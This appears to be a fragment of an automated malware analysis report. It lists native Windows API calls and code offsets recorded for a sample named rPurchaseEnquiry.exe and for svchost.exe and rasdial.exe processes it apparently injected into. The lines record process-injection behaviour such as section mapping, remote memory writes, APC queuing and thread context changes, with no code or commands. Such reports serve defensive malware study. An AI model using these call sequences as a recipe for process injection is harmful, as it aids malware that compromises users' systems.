                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872FB0 NtResumeThread,3_2_03872FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872FE0 NtCreateFile,3_2_03872FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872F30 NtCreateSection,3_2_03872F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872F60 NtCreateProcessEx,3_2_03872F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872E80 NtReadVirtualMemory,3_2_03872E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872EA0 NtAdjustPrivilegesToken,3_2_03872EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872EE0 NtQueueApcThread,3_2_03872EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872E30 NtWriteVirtualMemory,3_2_03872E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872DB0 NtEnumerateKey,3_2_03872DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872DD0 NtDelayExecution,3_2_03872DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872D00 NtSetInformationFile,3_2_03872D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872D10 NtMapViewOfSection,3_2_03872D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872D30 NtUnmapViewOfSection,3_2_03872D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872CA0 NtQueryInformationToken,3_2_03872CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872CC0 NtQueryVirtualMemory,3_2_03872CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872CF0 NtOpenProcess,3_2_03872CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C00 NtQueryInformationProcess,3_2_03872C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C60 NtCreateKey,3_2_03872C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03873090 NtSetValueKey,3_2_03873090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03873010 NtOpenDirectoryObject,3_2_03873010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038739B0 NtGetContextThread,3_2_038739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03873D10 NtOpenProcessToken,3_2_03873D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03873D70 NtOpenThread,3_2_03873D70
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C4650 NtSuspendThread,LdrInitializeThunk,5_2_051C4650
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C4340 NtSetContextThread,LdrInitializeThunk,5_2_051C4340
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_051C2D10
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_051C2D30
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2DD0 NtDelayExecution,LdrInitializeThunk,5_2_051C2DD0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_051C2DF0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_051C2C70
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2C60 NtCreateKey,LdrInitializeThunk,5_2_051C2C60
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_051C2CA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2F30 NtCreateSection,LdrInitializeThunk,5_2_051C2F30
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2FB0 NtResumeThread,LdrInitializeThunk,5_2_051C2FB0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2FE0 NtCreateFile,LdrInitializeThunk,5_2_051C2FE0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_051C2E80
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_051C2EE0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2B60 NtClose,LdrInitializeThunk,5_2_051C2B60
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_051C2BA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_051C2BF0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_051C2BE0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2AD0 NtReadFile,LdrInitializeThunk,5_2_051C2AD0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2AF0 NtWriteFile,LdrInitializeThunk,5_2_051C2AF0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C35C0 NtCreateMutant,LdrInitializeThunk,5_2_051C35C0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C39B0 NtGetContextThread,LdrInitializeThunk,5_2_051C39B0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2D00 NtSetInformationFile,5_2_051C2D00
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2DB0 NtEnumerateKey,5_2_051C2DB0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2C00 NtQueryInformationProcess,5_2_051C2C00
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2CC0 NtQueryVirtualMemory,5_2_051C2CC0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2CF0 NtOpenProcess,5_2_051C2CF0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2F60 NtCreateProcessEx,5_2_051C2F60
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2F90 NtProtectVirtualMemory,5_2_051C2F90
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2FA0 NtQuerySection,5_2_051C2FA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2E30 NtWriteVirtualMemory,5_2_051C2E30
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2EA0 NtAdjustPrivilegesToken,5_2_051C2EA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2B80 NtQueryInformationFile,5_2_051C2B80
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C2AB0 NtWaitForSingleObject,5_2_051C2AB0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C3010 NtOpenDirectoryObject,5_2_051C3010
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C3090 NtSetValueKey,5_2_051C3090
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C3D10 NtOpenProcessToken,5_2_051C3D10
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C3D70 NtOpenThread,5_2_051C3D70
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FC9320 NtCreateFile,5_2_02FC9320
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FC9640 NtClose,5_2_02FC9640
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FC97A0 NtAllocateVirtualMemory,5_2_02FC97A0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FC9490 NtReadFile,5_2_02FC9490
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FC9590 NtDeleteFile,5_2_02FC9590
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04FAF73F NtMapViewOfSection,5_2_04FAF73F
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04FAF023 NtQueryInformationProcess,5_2_04FAF023
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00BFA1EF
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BE8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00BE8310
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BF51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00BF51BD
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B9E6A00_2_00B9E6A0
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BBD9750_2_00BBD975
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BB21C50_2_00BB21C5
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BC62D20_2_00BC62D2
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C103DA0_2_00C103DA
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BC242E0_2_00BC242E
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BB25FA0_2_00BB25FA
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BA66E10_2_00BA66E1
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BEE6160_2_00BEE616
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BC878F0_2_00BC878F
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BF88890_2_00BF8889
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C108570_2_00C10857
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BA88080_2_00BA8808
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BC68440_2_00BC6844
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BBCB210_2_00BBCB21
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BC6DB60_2_00BC6DB6
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BA6F9E0_2_00BA6F9E
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BA30300_2_00BA3030
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BB31870_2_00BB3187
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BBF1D90_2_00BBF1D9
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B912870_2_00B91287
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BB14840_2_00BB1484
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BA55200_2_00BA5520
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BB76960_2_00BB7696
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BA57600_2_00BA5760
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BB19780_2_00BB1978
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BC9AB50_2_00BC9AB5
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B9FCE00_2_00B9FCE0
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C17DDB0_2_00C17DDB
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BBBDA60_2_00BBBDA6
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BB1D900_2_00BB1D90
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BA3FE00_2_00BA3FE0
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B9DF000_2_00B9DF00
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_017D36000_2_017D3600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004186D33_2_004186D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004168CF3_2_004168CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004168D33_2_004168D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004100933_2_00410093
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E0933_2_0040E093
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004011D03_2_004011D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E1D83_2_0040E1D8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E1E33_2_0040E1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402B533_2_00402B53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004023583_2_00402358
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004023603_2_00402360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402B603_2_00402B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040FE6A3_2_0040FE6A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040266D3_2_0040266D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004026703_2_00402670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040FE733_2_0040FE73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042EEB33_2_0042EEB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402FB03_2_00402FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E3F03_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039003E63_2_039003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA3523_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C02C03_2_038C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E02743_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F41A23_2_038F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039001AA3_2_039001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F81CC3_2_038F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038301003_2_03830100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA1183_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C81583_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D20003_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383C7C03_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038647503_2_03864750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038407703_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385C6E03_2_0385C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039005913_2_03900591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038405353_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EE4F63_2_038EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E44203_2_038E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F24463_2_038F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F6BD73_2_038F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FAB403_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA803_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0390A9A63_2_0390A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038569623_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038268B83_2_038268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E8F03_2_0386E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384A8403_2_0384A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BEFA03_2_038BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832FC83_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384CFE03_2_0384CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03882F283_2_03882F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860F303_2_03860F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E2F303_2_038E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4F403_2_038B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852E903_2_03852E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FCE933_2_038FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FEEDB3_2_038FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FEE263_2_038FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840E593_2_03840E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03858DBF3_2_03858DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383ADE03_2_0383ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384AD003_2_0384AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DCD1F3_2_038DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0CB53_2_038E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830CF23_2_03830CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840C003_2_03840C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0388739A3_2_0388739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F132D3_2_038F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382D34C3_2_0382D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038452A03_2_038452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385B2C03_2_0385B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E12ED3_2_038E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384B1B03_2_0384B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387516C3_2_0387516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382F1723_2_0382F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0390B16B3_2_0390B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EF0CC3_2_038EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F70E93_2_038F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FF0E03_2_038FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FF7B03_2_038FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F16CC3_2_038F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038856303_2_03885630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DD5B03_2_038DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039095C33_2_039095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F75713_2_038F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FF43F3_2_038FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038314603_2_03831460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385FB803_2_0385FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B5BF03_2_038B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387DBF93_2_0387DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFB763_2_038FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03885AA03_2_03885AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E1AA33_2_038E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EDAC63_2_038EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFA493_2_038FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F7A463_2_038F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B3A6C3_2_038B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D59103_2_038D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038499503_2_03849950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385B9503_2_0385B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038438E03_2_038438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AD8003_2_038AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03841F923_2_03841F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFFB13_2_038FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03803FD23_2_03803FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03803FD53_2_03803FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFF093_2_038FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03849EB03_2_03849EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385FDC03_2_0385FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03843D403_2_03843D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F1D5A3_2_038F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F7D733_2_038F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFCF23_2_038FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B9C323_2_038B9C32
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051905355_2_05190535
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052505915_2_05250591
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052344205_2_05234420
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052424465_2_05242446
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0523E4F65_2_0523E4F6
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051B47505_2_051B4750
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051907705_2_05190770
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0518C7C05_2_0518C7C0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051AC6E05_2_051AC6E0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051801005_2_05180100
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0522A1185_2_0522A118
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052181585_2_05218158
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052441A25_2_052441A2
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052501AA5_2_052501AA
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052481CC5_2_052481CC
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052220005_2_05222000
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524A3525_2_0524A352
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052503E65_2_052503E6
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0519E3F05_2_0519E3F0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052302745_2_05230274
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052102C05_2_052102C0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0519AD005_2_0519AD00
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0522CD1F5_2_0522CD1F
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051A8DBF5_2_051A8DBF
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0518ADE05_2_0518ADE0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05190C005_2_05190C00
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05230CB55_2_05230CB5
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05180CF25_2_05180CF2
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05232F305_2_05232F30
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051B0F305_2_051B0F30
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051D2F285_2_051D2F28
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05204F405_2_05204F40
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0520EFA05_2_0520EFA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05182FC85_2_05182FC8
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0519CFE05_2_0519CFE0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524EE265_2_0524EE26
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05190E595_2_05190E59
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051A2E905_2_051A2E90
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524CE935_2_0524CE93
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524EEDB5_2_0524EEDB
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051A69625_2_051A6962
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0525A9A65_2_0525A9A6
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0519A8405_2_0519A840
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051768B85_2_051768B8
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051BE8F05_2_051BE8F0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524AB405_2_0524AB40
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_05246BD75_2_05246BD7
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0518EA805_2_0518EA80
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052475715_2_05247571
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0522D5B05_2_0522D5B0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052595C35_2_052595C3
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524F43F5_2_0524F43F
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051814605_2_05181460
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524F7B05_2_0524F7B0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051D56305_2_051D5630
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052416CC5_2_052416CC
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0525B16B5_2_0525B16B
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0517F1725_2_0517F172
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_051C516C5_2_051C516C
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0519B1B05_2_0519B1B0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0524F0E05_2_0524F0E0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_052470E95_2_052470E9
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0523F0CC5_2_0523F0CC
